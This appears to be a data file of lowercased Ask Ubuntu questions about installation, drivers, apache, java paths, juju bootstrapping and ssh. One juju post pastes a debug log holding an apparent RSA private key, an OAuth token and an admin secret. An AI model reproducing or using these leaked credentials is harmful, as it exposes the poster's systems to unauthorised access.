438817	installation of ubuntu ( 12.04 , intel extreme graphics2 ) on a dell xp desktop	i 'm a senior and not very computer literate and need detailed help in installing ubuntu . i do have the download in my firefox/download file as an iso image file . what to do , not wanting to crash the xp ? t.i.a . wow , ca n't even respond to this onslaught . seems to me that installing ubuntu , which btw failed , regardless needs to still enable xp , , , , which i want to get away from = ms , that is . still need help in doing so .
438818	can not install software from ubuntu software center	whenever i try to install software from the ubuntu software center , it gives me the following error after i enter my password : package operation failed the installation or removal of a software package failed ok and if i try to install it a lot more times , a âśdetails thing apears . when i click that , it gives me this : dpkg : error : parsing file '/var/lib/dpkg/updates/0174 ' near line 0 : also something that might be helpful is that i am running ubuntu through virtualbox and when my computer crashed ( not the virtual one , but my mac one ) , i was running ubuntu in virtualbox , and ever since then i have had this problem . anyone know why ? thanks . edit : i 've tried again , and when i click details , the message changed : dpkg : error : parsing file '/var/lib/dpkg/updates/0174 ' near line 0 : eof after field name `'
438824	how do i show memory use graphically in the xfce panel ?	xubuntu has a nice way of showing network data flow in the panel ; put the network monitor in the panel and choose the network interface . i know that gnome has a similar feature in its system monitor http : //www.thegeekstuff.com/2009/11/ubuntu-tips-graphical-monitoring-for-processes-memory-load-average-and-disk-usage/ - but is there an xfce equivalent ?
438828	assistance with apache wildcard catchall	os : ubuntu 13.10 i followed this article setting up a wildcard apache virtual host + a wildcard dns to set up a wildcard virtual host so i do n't need to hack hosts files etc every time i set up a new project . i am getting 403 errors when trying to open a simple index.html file . error from /var/log/apache2/error.log [ mon mar 24 23:03:48.919858 2014 ] [ authz_core : error ] [ pid 3728 ] [ client 127.0.0.1:46408 ] ah01630 : client denied by server configuration : /home/moore/workspace/test/public/favicon.ico here is my apache config . < virtualhost *:80 > serveralias localhost *.dev # wildcard catch all virtualdocumentroot /home/moore/workspace/ % 1/public usecanonicalname off < directory `` home/moore/workspace '' > options followsymlinks allowoverride all order allow , deny allow from all < /directory > < /virtualhost > any ideas ?
438829	modprob acpi-cpufreq problem	i am trying to enable cpu frequency scaling . it seems that i should load acpi-cpufreq for my system . when i run sudo modprob acpi-cpufreq it executes without error . the problem is that i can not see it in lsmod and ( probably ) as a result i do not see a folder called cpufreq under `` /sys/devices/system/cpu/cpu0/ '' to set the governor . same thing happens with cpufreq_ondemand and other governor modules : modprob succeeds , but the module can not be seen in lsmod . here are some additional information : cpu model : intel ( r ) xeon ( r ) cpu e5645 @ 2.40ghz linux kernel : 3.5.0-23-generic distro : ubuntu 12.04 any help is much appreciated .
438833	install jdk6 on ubuntu 12.04 , can use it in root user but ca n't in normal user	i am trying to install jdk-6 in ubuntu 12.04 . i put the folder in /opt and set the environment path : vim /etc/profile vim /etc/bash.bashrc add this to both of the files : # set java environment export java_home=/opt/jdk1.6.0_37 export jre_home=/opt/jdk1.6.0_37/jre export classpath= . : $ java_home/lib : $ jre_home/lib : $ classpath export path= $ java_home/bin : $ jre_home/bin : $ path i change the user status to root userso i have the authority to edit the file . after that , i use java -version to check the result , it works fine in root user status : root @ brendon-lenovo : /home/brendon # java -version java version `` 1.6.0_45 '' java ( tm ) se runtime environment ( build 1.6.0_45-b06 ) java hotspot ( tm ) 64-bit server vm ( build 20.45-b01 , mixed mode ) but when i change back to normal user , i ca n't find the jdk i 've installed : brendon @ brendon-lenovo : ~ $ java -version 程序 'java ' 已包含在下列软件包中： * default-jre * gcj-4.6-jre-headless * openjdk-6-jre-headless * gcj-4.5-jre-headless * openjdk-7-jre-headless i check the profile and bash.bashrc , both of them are modified , so i really have no idea why ca n't i use jdk-6 in my normal status . does anyone know why ? i have tried sudo chmod -r 755 /opt/ [ java folder name ] sudo chown -r [ username ] /opt/ [ java folder name ] then i check the java -version , anyway , it does n't work . the program 'java ' can be found in the following packages : * default-jre * gcj-4.6-jre-headless * openjdk-6-jre-headless * gcj-4.5-jre-headless * openjdk-7-jre-headless
438838	outbound smtp redirect	how would i go about redirecting all outbound email on port 25 of my server to port 25 on another server using iptables . i have tried a few rules already and none of them are working . would appreciate any help that you could provide .
438839	ubuntu 13.10 - zebra tlp 2844 does not print using command line	after connecting to ubuntu 13.10 64-bit , zebra tlp 2844 printer is not printing landscape at all . but lsusb is showing printer is detected . how do you print the landscape mode ? following does nothing at all lpr -o portrait -o pagesize=24_mm__1___label__auto_ /tmp/print.txt
438844	ca n't write to new ext4 partition	i installed ubuntu 12.04 in a small ( 40gb ) partition created on the 1tb hdd of my win 8.1 dell laptop , and now want to increase storage . i resized an existing windows partition to free up 200 gb of unallocated space , and then tried creating a bootable usb for ubuntu live so i could resize my ubuntu partition , but ca n't get boot off usb to work . i booted into ubuntu normally ( off hdd ) and then used gparted to create a new 200 gb ext4 partition so i could at least mount it ( as /media/xxx ) and copy some data files there and maybe install some ubuntu software there rather than the main ubuntu partition -- but although i can mount the new partition when i try saving a file there i get an error message with `` the folder [ `` xxx '' ] can not be copied because you do not have permission to create it in the destination '' ... updated : found out that i just had to chmod ( i think as sudo ) to make it writeable by everyone ( ie . me as a user rather than sudo ) .
438845	will 14.04 be using x.org ?	i heard that 13.10 used a mix of mir and x.org . how about 14.04 ? will it also be using both or just mir . if its just mir then how do we get official ( not proprietary ) drivers to work ( by amd )
438846	i killed xbmcbuntu video output - help	i am pretty new to ubuntu and i am experiencing a problem that hopefully someone can help me with . i have a hp n54l server that i have had xbmcbuntu running on for about 12 months now . i have a radeon hd6450 video card in it that i use to connect to my tv . i have caused a problem whilst trying to install teamviewer which originally made the resolution 640x480 . my attempts to `` fix '' this problem has now caused me to not have any video output at all . even on initial startup ( bios ) there is n't any output at all . all i get is a blank screen via the on board vga and no signal on my tv via the hdmi on the hd6450 . looking at the system remotely it seems fine . i can still ssh into it . i can still get to my web gui of all of the services that i am running ( sickbeard , couchpotato etc . ) and they are all working as they should . locally however i ca n't do anything as i have no video whatsoever . steps taken to create the fault : installed couchpotato and configured - working perfectly installed teamviewer remotely via ssh started the teamviewer daemon remotely via ssh could n't get the status of teamviewer to work and give me the id so that i could log in and connect to it remotely . checked the physical machine and and the resolution was set to 640x480 attempts to fix as this is xbmcbuntu it loads by default to xbmc so i went to the settings menu within xbmc to change the resolution back to 1080p but there were no other available resolution options . reboot - still the same quit xbmc and log on to ubuntu desktop - still 640x480 tried to install proprietary drivers ( although from memory i think that catalyst control centre was available in settings already so it may have already been using that driver ) reboot no video , not even in on boot panic took hold and i tried uninstalling drivers , installing radeon standard driver etc etc but i just ca n't get it to work . found an older xorg.conf file that i had backed up from a few months ago when i must have edited it for some reason . the driver is set as fglrx so it was already configured with that driver anyway so i probably never had to mess with it copied this old xorg.conf onto the system i can no longer ssh into or ping the machine found a forum thread and followed the suggestion i found there . ran : sudo apt-get remove -- purge xorg-driver-fglrx fglrx* sudo apt-get remove -- purge fglrx* sudo apt-get install build-essential cdbs fakeroot dh-make debhelper debconf libstdc++6 dkms libqtgui4 wget execstack libelfg0 dh-modaliases sudo apt-get install -- reinstall libgl1-mesa-glx libgl1-mesa-dri sudo mv /etc/x11/xorg.conf /etc/x11/xorg.conf.old sudo dpkg-reconfigure xserver-xorg i removed the hd6450 video card out and managed to get it booted with the onboard vga . it booted up to a menu which i think is grub . i selected ubuntu from the menu and it brought up the xbmc logo but then went to a black screen after this . at this point i could ping again . i am now using the old xorg.conf file and it gives a pretty good resolution over the on board vga . put the 6450 back in . still no output on hdmi as expected but i hooked up the vga that comes with the 6450 and it is sending video out on that . it is only 640x480 though . current state of affairs i now have pretty decent resolution on the 6450 via vga but just not getting anything on the hdmi . when i run xrandr it says dfp1 and dfp2 are disconnected . i am pretty sure that dfp1 is the hdmi . i need that to be 1080p ! how can i get 1080p on this machine over hdmi again ? i would prefer not to reinstall but if i do , will i lose data ?
438848	13.10 nvidia drivers	i am having a brutal time getting ubuntu up and running on a new machine i recently put together . the key hardware is : i7 4770k gigabyte z87mx-d3h motherboard 16g corsair vengeance ram @ 1333mhz ( not clocked up to 2133mhz yet ) msi gtx770 gpu samsung ssds i can install 13.10 and get the bootloader working without a problem , but i can not get the nvidia drivers installed . i have tried the following processes : 1 ) installing via aptitude . attempting to install nvidia-current or nvidia-319 results in a single blinking cursor ( '_ ' ) on a black screen upon boot . some more details on this install process . with the gpu installed i am unable to bring up a virtual console ( ctrl+alt+f1-f6 freezes the desktop until i ctrl+alt+f7 back in ) , and therefore i am unable to kill x/lightdm . instead i boot into recovery mode when running integrated graphics to run the install . when i reinstall the gpu , i see the blinking cursor . booting into recovery yields the following log fragment before the system locks up : [ 1.104119 ] hda-intel : disabling msi [ 1.104173 ] hda-intel 0000:01:00.1 : handle vga-switcheroo audo client [ 1.104254 ] hda-intel 0000:01:00.1 : disabling 64bit dma [ 1.109000 ] hda-intel 0000:01:00.1 : enable delay in rirb handling [ 1.126262 ] microcode : cpu1 sig=0x306c3 , pf=0x2 , revision=0x9 [ 1.127582 ] microcode : cpu2 sig=0x306c3 , pf=0x2 , revision=0x9 [ 1.127871 ] microcode : cpu3 sig=0x306c3 , pf=0x2 , revision=0x9 [ 1.128209 ] microcode : cpu4 sig=0x306c3 , pf=0x2 , revision=0x9 [ 1.128519 ] microcode : cpu5 sig=0x306c3 , pf=0x2 , revision=0x9 [ 1.128823 ] microcode : cpu6 sig=0x306c3 , pf=0x2 , revision=0x9 [ 1.129136 ] microcode : cpu7 sig=0x306c3 , pf=0x2 , revision=0x9 [ 1.129482 ] microcode : microcode update driver : v2.00 < tigran @ aviazian.fsnet.co.uk > , peter oruba [ 1.130199 ] ppdev : user-space parallel port driver [ 1.139577 ] nvidia : module license 'nvidia ' taints kernel . [ 1.139634 ] disabling lock debugging due to kernel taint _ < -- system hangs , blinking cursor indefinitely 2 ) installing via nvidia 's install script ( nvidia*.run ) with the gpu installed . when i boot into recovery and attempt to run this , i see an error about the system not being able to write to /tmp . further investigation suggests that the filesystem is mounted as read-only , however i am unable to remount it ( sudo mount -o remount , rw ) 3 ) installing via nvidia 's install script ( nvidia*.run ) with the gpu removed , on integrated graphics . the script self-diagnostics all fail , but after proceeding anyway and ignoring the no nvidia hardware error it says something about nvidia.ko not being loaded . poking around in recovery suggests that the driver was not fully installed . as you can see , i have been iterating on this issue but to no avail . thanks for your time and i will appreciate any advice you can provide .
438850	system hanging after installation	i installed ubuntu through my usb and it showed me some error regarding some sda drive or something . after that a message displayed and the conclusion of that message is i should reboot my system in order to update . then after my system is not even booting . while installing ubuntu , my windows os even crashed . meanwhile i changed my default os to ubuntu . now i ca n't even start my system . i 'm desperately trying to open my system . does my lappy carshed ? i have some important files . suggest me a solution . thanks in advance : )
438851	juju bootstrap in maas fails to retrieve juju tools	i installed maas , added the nodes and created the juju but while i tried the following code juju bootstrap i am getting this error . warning no tools available , attempting to retrieve from https : //juju-dist.s3.amazonaws.com/ error gomaasapi : got error back from server : 404 not found how can i fix this ? juju version 1.16.6-precise-i386 os version ubuntu-12.04.4-server-i386 this is the error i am facing * juju bootstrap -- debug 2014-04-17 05:41:31 debug juju.environs open.go:75 configforname found bootstrap config map [ string ] interface { } { `` default-series '' : '' precise '' , `` image-metadata-url '' : '' '' , `` tools-url '' : '' '' , `` admin-secret '' : '' 416286bfc6e9143566dc37749676ef18 '' , `` api-port '' :17070 , `` ca-private-key '' : '' -- -- -begin rsa private key -- -- -\nmiicxaibaakbgqccbn54zcm+b9kguwlw4ft6c16/cn/g4esap/hxbyl7g61t8y/i\ncvblqfn+ytar6qgcbpuvcfptb1sl0kw9oskd4g5krxoqxcqpv9uoeppwzteadfdk\nglzcrr1lhfsw/nkksxe8wwzxtg8zjpyjc+s1uojobojjeiph43bzqk1ynwidaqab\naogajdszgmlgbxa6mka+ftsyvtm9amjhcsllyyy6phqvdhgzpn1eunbvztk1snur\n0ywx0oc9wsy31dhmegezvidwpeitcyklo4aum9nhocmjknoqdmeymlhgmigmp3tm\nimyykczvfouf7w35iwxwcp+x9lqers6vz+k1gnd5szzwgwecqqdgszgr3bpkweqz\nj+zpm8oco0vzonp1hxgcesl+nyjqmgjl7k5cznvc3exwwfytiwusge8ygh4hxbtm\nmcxnv7ybakeayqtebuzpqozb9fnt1eecxnqrgpefc8wtfw+cl+tenjob9k2pgq6a\n8hhi86z+4dey7sgexpwbcvku8dhzw+cfhwjaepodkgshdr4wdnnpr1rsmm/a/86y\nto7w1wmnrv8s/dmj17550ls61bihfmtkxkths85tg1ty65nq/mtrdpzpgqjbalas\negafvtzbwi4tbfcg8yoqh7cgwl3n8g7fciwd1fr9c8lsyzkntx1ycy+baimp4yz1\nlxlcg4sfm2vjowvpdzkcqdzv6qgjof2kflt9nct3mthjmpum8nf5b1vfml4udmsj\nipo5aypszowg7rt0tmd5qc4eclpm7dcestu+h/low2y=\n -- -- -end rsa private key -- -- -\n '' , `` firewall-mode '' : '' instance '' , `` logging-config '' : '' < root > =debug '' , `` maas-agent-name '' : '' 2ddaa65c-8f70-4845-8245-656d1f56e4c0 '' , `` maas-oauth '' : '' kdpcnu7sae4ht3sxm8:3q3wtahagr6rxyp3tf : dbv45z3vfgjcj4wsv9dml2t7sxmn9per '' , `` type '' : '' maas '' , `` ca-cert '' : '' -- -- -begin certificate -- -- -\nmiicvzccackgawibagibadalbgkqhkig9w0baquwqjenmasga1uechmeanvqdtex\nmc8ga1ueawwoanvqds1nzw5lcmf0zwqgq0egzm9yigvudmlyb25tzw50icjtywfz\nijaefw0xndazmdmwodu3mzbafw0yndazmdmwotaymzbameixdtalbgnvbaotbgp1\nanuxmtavbgnvbammkgp1anutz2vuzxjhdgvkienbigzvciblbnzpcm9ubwvudcai\nbwfhcyiwgz0wcwyjkozihvcnaqeba4gnadcbiqkbgqccbn54zcm+b9kguwlw4ft6\nc16/cn/g4esap/hxbyl7g61t8y/icvblqfn+ytar6qgcbpuvcfptb1sl0kw9oskd\n4g5krxoqxcqpv9uoeppwzteadfdkglzcrr1lhfsw/nkksxe8wwzxtg8zjpyjc+s1\nuojobojjeiph43bzqk1ynwidaqabo2mwytaobgnvhq8baf8ebamcakqwdwydvr0t\naqh/bauwaweb/zadbgnvhq4efgqudtaotkuo1lj9rzvs6g3gxqobdfgwhwydvr0j\nbbgwfoaudtaotkuo1lj9rzvs6g3gxqobdfgwcwyjkozihvcnaqefa4gbai2xgd/l\n/nahks18wrnqsnhgw++rdfq46fupew9g/ca+fgv1bxu/tlaqv92prmi4+1kuyjyg\nkavp6f7lnnby2ytute660qozwpb/aewn4k31wgkwu3z+xrchfnhmh9hoc3cxkz/b\nggtap5rtxid3ouxzovr1jqukmg9jaakmhqg+\n -- -- -end certificate -- -- -\n '' , `` development '' : false , `` name '' : '' maas '' , `` state-port '' :37017 , `` authorized-keys '' : '' ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqdrajetkue1+avuklqtzw/xqr0ojpjrdquypqiwrozaar1q5lrwxa/sulizh+ritqpvjiacorgxhaxbwj/vxm+gahvmlzi9i7j4hs38hlbjcnedlma+pnqnwdulhkfcd4ps26lrr8fohilqkbw8kwzhygjniljth5zpn88zixtqgs1yfmze1uhb1uusp/naocge1bbdvrsno2ao1isos9+dfi7xz0ctvdbe0g+zjnbtgkyfjdswpss8fro1jwdvzqdpbzsarec/j32kerx+licyvesuz4d0kc5qtxalrnchufhlamb95tqjjqxeipbj/5ksf3tnak+9g0uy7rrhmb13 root @ motpl\n '' , `` maas-server '' : '' http : //192.168.1.29:80/maas/ '' , `` ssl-hostname-verification '' : true } 2014-04-17 05:41:32 debug juju.environs.configstore disk.go:77 making /root/.juju/environments 2014-04-17 05:41:32 info juju.environs open.go:156 environment info already exists ; using new not prepare 2014-04-17 05:41:32 debug juju.provider.maas environprovider.go:33 opening environment `` maas '' . 2014-04-17 05:41:33 debug juju.cmd.juju bootstrap.go:191 looking for bootstrap tools 2014-04-17 05:41:33 info juju.environs.tools tools.go:181 filtering tools by released version 2014-04-17 05:41:33 info juju.environs.tools tools.go:85 reading tools with major.minor version 1.16 2014-04-17 05:41:33 info juju.environs.tools tools.go:96 filtering tools by series : precise 2014-04-17 05:41:33 debug juju.environs.tools tools.go:44 no architecture specified when finding tools , looking for any 2014-04-17 05:41:33 debug juju.environs.simplestreams simplestreams.go:458 fetchdata failed for `` tools/streams/v1/index.sjson '' : file '2ddaa65c-8f70-4845-8245-656d1f56e4c0-tools/streams/v1/index.sjson ' not found not found 2014-04-17 05:41:33 debug juju.environs.simplestreams simplestreams.go:432 can not load index `` streams/v1/index.sjson '' : invalid url `` tools/streams/v1/index.sjson '' not found 2014-04-17 05:41:33 debug juju.environs.simplestreams simplestreams.go:458 fetchdata failed for `` tools/streams/v1/index.json '' : file '2ddaa65c-8f70-4845-8245-656d1f56e4c0-tools/streams/v1/index.json ' not found not found 2014-04-17 05:41:33 debug juju.environs.simplestreams simplestreams.go:432 can not load index `` streams/v1/index.json '' : invalid url `` tools/streams/v1/index.json '' not found 2014-04-17 05:41:33 warning juju.cmd.juju bootstrap.go:204 no tools available , attempting to retrieve from https : //juju-dist.s3.amazonaws.com/ 2014-04-17 05:41:33 info juju.environs.sync sync.go:66 listing available tools listing available tools 2014-04-17 05:41:33 debug juju.environs.tools storage.go:33 reading v1.16 tools 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.0-precise-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.0-precise-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.0-quantal-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.0-quantal-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.0-raring-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.0-raring-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.0-saucy-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.0-saucy-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.2-precise-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.2-precise-armhf 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.2-precise-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.2-quantal-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.2-quantal-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.2-raring-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.2-raring-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.2-saucy-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.2-saucy-armhf 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.2-saucy-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.2-trusty-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.2-trusty-armhf 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.2-trusty-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.3-precise-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.3-precise-armhf 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.3-precise-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.3-quantal-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.3-quantal-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.3-raring-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.3-raring-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.3-saucy-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.3-saucy-armhf 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.3-saucy-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.3-trusty-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.3-trusty-armhf 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.3-trusty-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.4-precise-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.4-precise-armhf 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.4-precise-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.4-quantal-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.4-quantal-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.4-raring-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.4-raring-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.4-saucy-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.4-saucy-armhf 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.4-saucy-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.4-trusty-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.4-trusty-armhf 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.4-trusty-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.5-precise-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.5-precise-armhf 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.5-precise-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.5-quantal-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.5-quantal-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.5-raring-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.5-raring-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.5-saucy-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.5-saucy-armhf 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.5-saucy-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.5-trusty-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.5-trusty-armhf 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.5-trusty-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.6-precise-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.6-precise-armhf 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.6-precise-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.6-quantal-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.6-quantal-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.6-saucy-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.6-saucy-armhf 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.6-saucy-i386 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.6-trusty-amd64 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.6-trusty-armhf 2014-04-17 05:41:37 debug juju.environs.tools storage.go:61 found 1.16.6-trusty-i386 2014-04-17 05:41:37 info juju.environs.sync sync.go:90 found 71 tools found 71 tools 2014-04-17 05:41:37 info juju.environs.sync sync.go:94 found 11 recent tools ( version 1.16.6 ) found 11 recent tools ( version 1.16.6 ) 2014-04-17 05:41:37 debug juju.environs.sync sync.go:97 found source tool : & { 1.16.6-precise-amd64 https : //juju-dist.s3.amazonaws.com/tools/releases/juju-1.16.6-precise-amd64.tgz 0 } 2014-04-17 05:41:37 debug juju.environs.sync sync.go:97 found source tool : & { 1.16.6-precise-armhf https : //juju-dist.s3.amazonaws.com/tools/releases/juju-1.16.6-precise-armhf.tgz 0 } 2014-04-17 05:41:37 debug juju.environs.sync sync.go:97 found source tool : & { 1.16.6-precise-i386 https : //juju-dist.s3.amazonaws.com/tools/releases/juju-1.16.6-precise-i386.tgz 0 } 2014-04-17 05:41:37 debug juju.environs.sync sync.go:97 found source tool : & { 1.16.6-quantal-amd64 https : //juju-dist.s3.amazonaws.com/tools/releases/juju-1.16.6-quantal-amd64.tgz 0 } 2014-04-17 05:41:37 debug juju.environs.sync sync.go:97 found source tool : & { 1.16.6-quantal-i386 https : //juju-dist.s3.amazonaws.com/tools/releases/juju-1.16.6-quantal-i386.tgz 0 } 2014-04-17 05:41:37 debug juju.environs.sync sync.go:97 found source tool : & { 1.16.6-saucy-amd64 https : //juju-dist.s3.amazonaws.com/tools/releases/juju-1.16.6-saucy-amd64.tgz 0 } 2014-04-17 05:41:37 debug juju.environs.sync sync.go:97 found source tool : & { 1.16.6-saucy-armhf https : //juju-dist.s3.amazonaws.com/tools/releases/juju-1.16.6-saucy-armhf.tgz 0 } 2014-04-17 05:41:37 debug juju.environs.sync sync.go:97 found source tool : & { 1.16.6-saucy-i386 https : //juju-dist.s3.amazonaws.com/tools/releases/juju-1.16.6-saucy-i386.tgz 0 } 2014-04-17 05:41:37 debug juju.environs.sync sync.go:97 found source tool : & { 1.16.6-trusty-amd64 https : //juju-dist.s3.amazonaws.com/tools/releases/juju-1.16.6-trusty-amd64.tgz 0 } 2014-04-17 05:41:37 debug juju.environs.sync sync.go:97 found source tool : & { 1.16.6-trusty-armhf https : //juju-dist.s3.amazonaws.com/tools/releases/juju-1.16.6-trusty-armhf.tgz 0 } 2014-04-17 05:41:37 debug juju.environs.sync sync.go:97 found source tool : & { 1.16.6-trusty-i386 https : //juju-dist.s3.amazonaws.com/tools/releases/juju-1.16.6-trusty-i386.tgz 0 } 2014-04-17 05:41:37 info juju.environs.sync sync.go:100 listing target bucket listing target bucket 2014-04-17 05:41:37 debug juju.environs.tools storage.go:35 reading v1 . * tools 2014-04-17 05:41:37 error juju supercommand.go:282 gomaasapi : got error back from server : 404 not found * after updating juju i am getting the following error juju bootstrap warning failed to write bootstrap-verify file : gomaasapi : got error back from server : 404 not found ( object not found ! */ -- > object not found ! the requested url was not found on this server . if you entered the url manually please check your spelling and try again . if you think this is a server error , please contact the webmaster . error 404 192.168.1.29 apache/2.4.4 ( unix ) openssl/1.0.1e php/5.5.3 mod_perl/2.0.8-dev perl/v5.16.3 ) bootstrap failed , destroying environment error bootstrap failed , and the environment could not be destroyed : gomaasapi : got error back from server : 404 not found ( object not found ! */ -- > object not found ! the requested url was not found on this server . if you entered the url manually please check your spelling and try again . if you think this is a server error , please contact the webmaster . error 404 192.168.1.29 apache/2.4.4 ( unix ) openssl/1.0.1e php/5.5.3 mod_perl/2.0.8-dev perl/v5.16.3 ) error provider storage is not writable
438852	how to remove ubuntu partition from windows 7 ? which partition is it ?	a similar question has been asked here : how do i remove my ubuntu partition from windows 7 and reuse the space ? , and i 've used the advice that was posted . however , i still ca n't figure out which of the partitions is ubuntu . here 's a screenshot after i run diskmgmt.msc i need a fresh install of ubuntu since my current one has suddenly stopped working . i had used .iso image by mounting the image and installing it on a thumb drive when i partitioned it . to do the above , do i need to remove the partition first from diskmgmt.msc and then go about partitioning it again from the image like i did the first time around ? update . i get `` boot error '' when i try to run the ubuntu installer by booting from usb . when i press enter , it takes me to the grub screen . do i need to use windows recovery disk to repair so that grub is no longer there ? ( this problem was resolved ) i have now attached the screenshot that i get when i choose `` something else '' when the installer asks me how i want to partition my disk . it seems the 52.64 gb was the one with ubuntu on it . i was confused because according to the diskmgmt.msc it 's 100 % free . . i have deleted ext4 and swap , restarted the install , selected `` install ubuntu alongside them '' and that seems to have worked . thanks everyone for the advice !
438854	pulseaudio gui images	can anyone tell me what the symbols mean in the sound manager gui under the `` output devices '' tab ? there is one symbol that is a green rectangle and a blue music note . the other is a dark grey square with a red `` not allowed '' symbol . i ask because i have been having some trouble with the g930 device . i am wondering if this is a warning of some type . p.s . sorry for the simple question . i found alot of command line documentation but not much on the gui for pulseaudio
438856	can i have common cd for 64 bit ubuntu and 32 bit ubuntu ?	why does not ubuntu have a common cd to install ubuntu , choosing at time of installation whether to install 32 bit or 64 bit ubuntu , like windows disks . is there any tweak that would allow installation of 32 bit ubuntu and 64 bit ubuntu from same cd ?
438860	password not working	i disabled my password in ubuntu through the user accounts settings so i would n't be prompted for everything . now , my sudo command password does n't work , and that is a huge hindrance . there was no problem with the sudo command before i disabled the password . thanks in advance , i really need some direction , i 've looked everywhere .
438861	uninstall not properly installed ( maybe corrupt ? ) ubuntu from windows 8 . help would be appreciated	thank you in advance for reading.i got this used laptop that runs windows 8 . it apparently has ubuntu installed on it when i boot the screen . for this laptop i want to run solely windows and i want to uninstall it . i went to the disk management and found that there is 20gb that ubuntu is occupying . however when i try to boot ubuntu it gives me an error message saying that `` windows 8 failed to start ... '' . how do i completely get rid of ubuntu ? i tried deleting the partition but there is no `` delete volume '' option . i have no idea how ubuntu was installed or if it ever was able to launch . if anyone can please help me i would greatly appreciate it . i am sorry if my sentences do not make sense , english is my second language . i am also not that computer literate so go easy on me please . thank you !
438862	ssh working so slow	whenever i start my local ssh login i have to wait for seconds to write a complete command . even `` ls '' is taking so much time . i am using it wireless with two of my linux laptops and connecting to my college wifi network .
